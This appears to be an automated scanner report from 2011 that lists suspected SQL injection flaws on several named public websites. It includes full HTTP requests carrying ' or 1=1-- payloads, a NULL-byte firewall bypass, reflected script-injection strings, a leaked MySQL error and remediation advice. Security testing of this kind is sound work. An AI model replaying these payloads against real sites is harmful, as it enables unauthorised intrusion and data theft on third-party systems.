SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The __utmb cookie appears to be vulnerable to SQL injection attacks. The payloads 15904219'%20or%201%3d1--%20 and 15904219'%20or%201%3d2--%20 were each submitted in the __utmb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET / HTTP/1.1 Host: isp.thelist.com Proxy-Connection: keep-alive Referer: http://www.thelist.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026088464:ss=1298026063098; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; __utmc=219744476; __utmb=219744476.6.10.129803325115904219'%20or%201%3d1--%20
Response 1
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 12:48:28 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 12:49:28 GMT Content-Type: text/html Content-Length: 45853
The clientID parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the clientID parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /pixel?pixelID=24197&partnerID=12&clientID=3815%00'&key=segment HTTP/1.1 Host: segment-pixel.invitemedia.com Proxy-Connection: keep-alive Referer: http://www.internet.com/developer?2d7d7%3Cscript%3Ealert(document.cookie)%3C/script%3Ea487c4b6236=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid=002d9af2-d1e0-46f3-a4d5-a4e3b437adec; exchange_uid=eyI0IjogWyJFMCIsIDczNDE4M119; segments_p1="eJzjYuY4ycHFxfFxG5PA5VlXX7NwMXP84+Bi4Xh5kBEAdk8IyQ=="
Response 1
HTTP/1.0 200 OK Content-Type: text/html Connection: close X-Error-Code: 503 Content-Length: 0
Request 2
GET /pixel?pixelID=24197&partnerID=12&clientID=3815%00''&key=segment HTTP/1.1 Host: segment-pixel.invitemedia.com Proxy-Connection: keep-alive Referer: http://www.internet.com/developer?2d7d7%3Cscript%3Ealert(document.cookie)%3C/script%3Ea487c4b6236=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid=002d9af2-d1e0-46f3-a4d5-a4e3b437adec; exchange_uid=eyI0IjogWyJFMCIsIDczNDE4M119; segments_p1="eJzjYuY4ycHFxfFxG5PA5VlXX7NwMXP84+Bi4Xh5kBEAdk8IyQ=="
Response 2
HTTP/1.0 302 Found Server: IM BidManager Date: Fri, 18 Feb 2011 16:55:10 GMT Expires: Fri, 18-Feb-2011 16:54:50 GMT Location: http://ad.yieldmanager.com/pixel?id=1172643&t=2 Pragma: no-cache Cache-Control: no-cache P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Content-Type: text/plain Set-Cookie: segments_p1=eJzjYuY4ycHFwvHyICOQbN3LyMXM8Y+Di4vj4zYmgcuzrr5mAQCN0woi; Domain=invitemedia.com; expires=Sat, 18-Feb-2012 16:55:10 GMT; Path=/
The rxtype parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the rxtype parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Connection: close Date: Fri, 18 Feb 2011 03:24:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
{history:false, tid:1, sid:0, title:'Page Error',onload:function(){oModeless('error','<h1 class=title>We apologize, however there was an error with your request.</h1>/vcloud_express.cfm?rxtype=15 ...[SNIP]... <td>\r\n\t\t\t\t\tjava.sql.SQLException: [Macromedia][SQLServer JDBC Driver]Invalid parameter binding(s).\n\tat macromedia.jdbc.base.BaseExceptions.createException(Unknown Source)\n\tat macromedia.jdbc.base.BaseExceptions.getException(Unkno ...[SNIP]...
HTTP/1.1 200 OK Connection: close Date: Fri, 18 Feb 2011 03:24:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
{"history":true,"resp":15,"url":"vcloud_express.cfm","query":"","name":"vcloud_express","title":"vCloud Express Public Cloud Offering- Cloud Hosting | Cloud Servers | Managed Cloud Hosting | Managed C ...[SNIP]...
The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 27357565'%20or%201%3d1--%20 and 27357565'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=1 HTTP/1.1 Host: www.intranetjournal.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: QUADIDX=107; intmintc__welcome; toURL=http%3A//www.intranetjournal.com/%3Fc5d85--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E177b53bcb4%3D1; qsg=14508; __utmz=167246694.1298042932.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)27357565'%20or%201%3d1--%20; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298035735007:ss=1298035735007; __utma=167246694.598188733.1298042932.1298042932.1298042932.1; __utmc=167246694; __utmb=167246694.2.10.1298042932
Response 1
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 16:52:07 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 16:53:07 GMT Content-Type: text/html Content-Length: 149349
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <HTML> <HEAD> <!-- test --> <link href="http://www.intranetjournal.com/feed.xml" rel="alternate" type="application/rss+xml" title="Intranet Jou ...[SNIP]... <a href="http://o1.qnsr.com/cgi/r?;n=203;c=661113/661095/661075/581331/581034;s=9539;x=7936;f=1242120994;u=j;z=20110218115207" target="_blank"> <img border="0" width="0" height="0" src="http://o1.qnsr.com/cgi/x?;n=203;c=661113/661095/661075/581331/581034;s=9539;x=7936;f=1242120994;u=j;z=20110218115207" alt="Click here"></a> </noscript> </span>
<div class="KonaFilter"> <!------ OAS AD 'house_ribbon' begin ------> <SCRIPT LANGUAGE=JavaScript> <!-- OAS_AD('house_ribbon'); //--> </SCRIPT> <NOSCRIPT> <A HREF="http://63.236.18.118/RealMedia/ads/click_nx.ads/intm/it/www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/index@125x125-1,120x60-1,flex,468x60-1,accessunit,accessunit_one,accessunit_three,accessunit_two,ciu,336x280-2,house_ribbon,send,cp1,cp2,cp3,cp4,cp5,cp6,cp7,cp8,cp9,cp10,cp11,cp12,cp13,cp14!house_ribbon" > <IMG SRC="http://63.236.18.118/RealMedia/ads/adstream_nx.ads/intm/it/www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/index@125x125-1,120x60-1,flex,468x60-1,accessunit,accessunit_one,accessunit_three,accessunit_two,ciu,336x280-2,house_ribbon,send,cp1,cp2,cp3,cp4,cp5,cp6,cp7,cp8,cp9,cp10,cp11,cp12,cp13,cp14!house_ribbon" border=0> </A> </NOSCRIPT> <!------ OAS AD 'house_ribbon' end ------> </div>
The c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4 parameter appears to be vulnerable to SQL injection attacks. The payloads 60248758'%20or%201%3d1--%20 and 60248758'%20or%201%3d2--%20 were each submitted in the c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4 parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=160248758'%20or%201%3d1--%20 HTTP/1.1 Host: www.intranetjournal.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: QUADIDX=107; intmintc__welcome; toURL=http%3A//www.intranetjournal.com/%3Fc5d85--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E177b53bcb4%3D1; qsg=14508; __utmz=167246694.1298042932.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298035735007:ss=1298035735007; __utma=167246694.598188733.1298042932.1298042932.1298042932.1; __utmc=167246694; __utmb=167246694.2.10.1298042932
Response 1
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 16:49:54 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 16:50:54 GMT Content-Type: text/html Content-Length: 149480
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <HTML> <HEAD> <!-- test --> <link href="http://www.intranetjournal.com/feed.xml" rel="alternate" type="application/rss+xml" title="Intranet Jou ...[SNIP]... <a href="http://o1.qnsr.com/cgi/r?;n=203;c=661113/661095/661075/581331/581034;s=9539;x=7936;f=243729054;u=j;z=20110218114954" target="_blank"> <img border="0" width="0" height="0" src="http://o1.qnsr.com/cgi/x?;n=203;c=661113/661095/661075/581331/581034;s=9539;x=7936;f=243729054;u=j;z=20110218114954" alt="Click here"></a> </noscript> </span>
<div class="KonaFilter"> <!------ OAS AD 'house_ribbon' begin ------> <SCRIPT LANGUAGE=JavaScript> <!-- OAS_AD('house_ribbon'); //--> </SCRIPT> <NOSCRIPT> <A HREF="http://63.236.18.118/RealMedia/ads/click_nx.ads/intm/it/www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/index@125x125-1,120x60-1,flex,468x60-1,accessunit,accessunit_one,accessunit_three,accessunit_two,ciu,336x280-2,house_ribbon,send,cp1,cp2,cp3,cp4,cp5,cp6,cp7,cp8,cp9,cp10,cp11,cp12,cp13,cp14!house_ribbon" > <IMG SRC="http://63.236.18.118/RealMedia/ads/adstream_nx.ads/intm/it/www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/index@125x125-1,120x60-1,flex,468x60-1,accessunit,accessunit_one,accessunit_three,accessunit_two,ciu,336x280-2,house_ribbon,send,cp1,cp2,cp3,cp4,cp5,cp6,cp7,cp8,cp9,cp10,cp11,cp12,cp13,cp14!house_ribbon" border=0> </A> </NOSCRIPT> <!------ OAS AD 'house_ribbon' end ------> </div>
The intmintc__welcome; toURL cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the intmintc__welcome; toURL cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=1 HTTP/1.1 Host: www.intranetjournal.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: QUADIDX=107; intmintc__welcome; toURL=http%3A//www.intranetjournal.com/%3Fc5d85--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E177b53bcb4%3D1'%20and%201%3d1--%20; qsg=14508
Response 1
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 16:53:06 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 16:54:06 GMT Content-Type: text/html Content-Length: 149341
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <HTML> <HEAD> <!-- test --> <link href="http://www.intranetjournal.com/feed.xml" rel="alternate" type="application/rss+xml" title="Intranet Jou ...[SNIP]... <a href="http://o1.qnsr.com/cgi/r?;n=203;c=661113/661095/661075/581331/581034;s=9539;x=7936;f=1000379096;u=j;z=20110218115306" target="_blank"> <img border="0" width="0" height="0" src="http://o1.qnsr.com/cgi/x?;n=203;c=661113/661095/661075/581331/581034;s=9539;x=7936;f=1000379096;u=j;z=20110218115306" alt="Click here"></a> </noscript> </span>
<div class="KonaFilter"> <!------ OAS AD 'house_ribbon' begin ------> <SCRIPT LANGUAGE=JavaScript> <!-- OAS_AD('house_ribbon'); //--> </SCRIPT> <NOSCRIPT> <A HREF="http://63.236.18.118/RealMedia/ads/click_nx.ads/intm/it/www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/index@125x125-1,120x60-1,flex,468x60-1,accessunit,accessunit_one,accessunit_three,accessunit_two,ciu,336x280-2,house_ribbon,send,cp1,cp2,cp3,cp4,cp5,cp6,cp7,cp8,cp9,cp10,cp11,cp12,cp13,cp14!house_ribbon" > <IMG SRC="http://63.236.18.118/RealMedia/ads/adstream_nx.ads/intm/it/www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/index@125x125-1,120x60-1,flex,468x60-1,accessunit,accessunit_one,accessunit_three,accessunit_two,ciu,336x280-2,house_ribbon,send,cp1,cp2,cp3,cp4,cp5,cp6,cp7,cp8,cp9,cp10,cp11,cp12,cp13,cp14!house_ribbon" border=0> </A> </NOSCRIPT> <!------ OAS AD 'house_ribbon' end ------> </div>
1.7. http://www.isp-planet.com/about/sitemap.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.isp-planet.com
Path:
/about/sitemap.html
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /about/sitemap.html?1'%20and%201%3d1--%20=1 HTTP/1.1 Host: www.isp-planet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;
Response 1
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 17:30:29 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 17:31:29 GMT Connection: close Content-Type: text/html Content-Length: 66508
<HTML> <HEAD> <TITLE>ISP-Planet - Welcome</TITLE> <META name="description" content="ISP-Planet has business and marketing advice for ISPs, plus specialized isp information resources. It reports on IS ...[SNIP]... <a href="http://o1.qnsr.com/cgi/r?;n=203;c=695826/641338/581996/581034;s=9538;x=3584;f=1175618564;u=j;z=20110218123029" target="_blank"> <img border="0" width="728" height="90" src="http://o1.qnsr.com/cgi/x?;n=203;c=695826/641338/581996/581034;s=9538;x=3584;f=1175618564;u=j;z=20110218123029" alt="Click here"></a> </noscript> </div>
GET /about/sitemap.html?1'%20and%201%3d2--%20=1 HTTP/1.1 Host: www.isp-planet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;
Response 2
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 17:30:30 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 17:31:30 GMT Connection: close Content-Type: text/html Content-Length: 66498
<HTML> <HEAD> <TITLE>ISP-Planet - Welcome</TITLE> <META name="description" content="ISP-Planet has business and marketing advice for ISPs, plus specialized isp information resources. It reports on IS ...[SNIP]... <a href="http://o1.qnsr.com/cgi/r?;n=203;c=695826/641338/581996/581034;s=9538;x=3584;f=658476016;u=j;z=20110218123030" target="_blank"> <img border="0" width="728" height="90" src="http://o1.qnsr.com/cgi/x?;n=203;c=695826/641338/581996/581034;s=9538;x=3584;f=658476016;u=j;z=20110218123030" alt="Click here"></a> </noscript> </div>
The qsg cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the qsg cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /resources/directories/state_puc.html HTTP/1.1 Host: www.isp-planet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508'%20and%201%3d1--%20; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;
Response 1
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 17:23:26 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 17:24:26 GMT Connection: close Content-Type: text/html Content-Length: 55371
<HTML> <HEAD> <TITLE>ISP Planet - Resources - State PUC Directory </TITLE> <META NAME="description" CONTENT="information on information and resources for ISPs"> <META NAME="channel" CONTENT="ISP Resou ...[SNIP]... <a href="http://o1.qnsr.com/cgi/r?;n=203;c=695826/641338/581996/581034;s=9538;x=3584;f=459193610;u=j;z=20110218122326" target="_blank"> <img border="0" width="728" height="90" src="http://o1.qnsr.com/cgi/x?;n=203;c=695826/641338/581996/581034;s=9538;x=3584;f=459193610;u=j;z=20110218122326" alt="Click here"></a> </noscript> </div>
The intmintc__welcome cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the intmintc__welcome cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /services/merchants/index.html HTTP/1.1 Host: www.isp-planet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: QUADIDX=107; intmintc__welcome='%20and%201%3d1--%20; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;
Response 1
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 17:20:38 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 17:21:38 GMT Connection: close Content-Type: text/html Content-Length: 56902
The qsg cookie appears to be vulnerable to SQL injection attacks. The payloads 75422568'%20or%201%3d1--%20 and 75422568'%20or%201%3d2--%20 were each submitted in the qsg cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /services/registrars/chart.html HTTP/1.1 Host: www.isp-planet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=1450875422568'%20or%201%3d1--%20; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;
Response 1
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 17:27:17 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 17:28:17 GMT Connection: close Content-Type: text/html Content-Length: 85525
The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 21473983'%20or%201%3d1--%20 and 21473983'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /services/voip_wholesalers/chart.html HTTP/1.1 Host: www.isp-planet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.121473983'%20or%201%3d1--%20; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;
Response 1
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 17:30:47 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 17:31:47 GMT Connection: close Content-Type: text/html Content-Length: 85141
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /outsourcing-dot-net-development-contact-us.html HTTP/1.1 Host: www.outsourcingdotnetdevelopment.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=' Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hf79nisglos82m29flubv3rp81
Response 1
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 16:56:22 GMT Server: Apache Vary: Accept-Encoding X-Powered-By: PHP/5.2.14 Content-Type: text/html Content-Length: 171
Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''',now())' at line 1
Request 2
GET /outsourcing-dot-net-development-contact-us.html HTTP/1.1 Host: www.outsourcingdotnetdevelopment.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q='' Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hf79nisglos82m29flubv3rp81
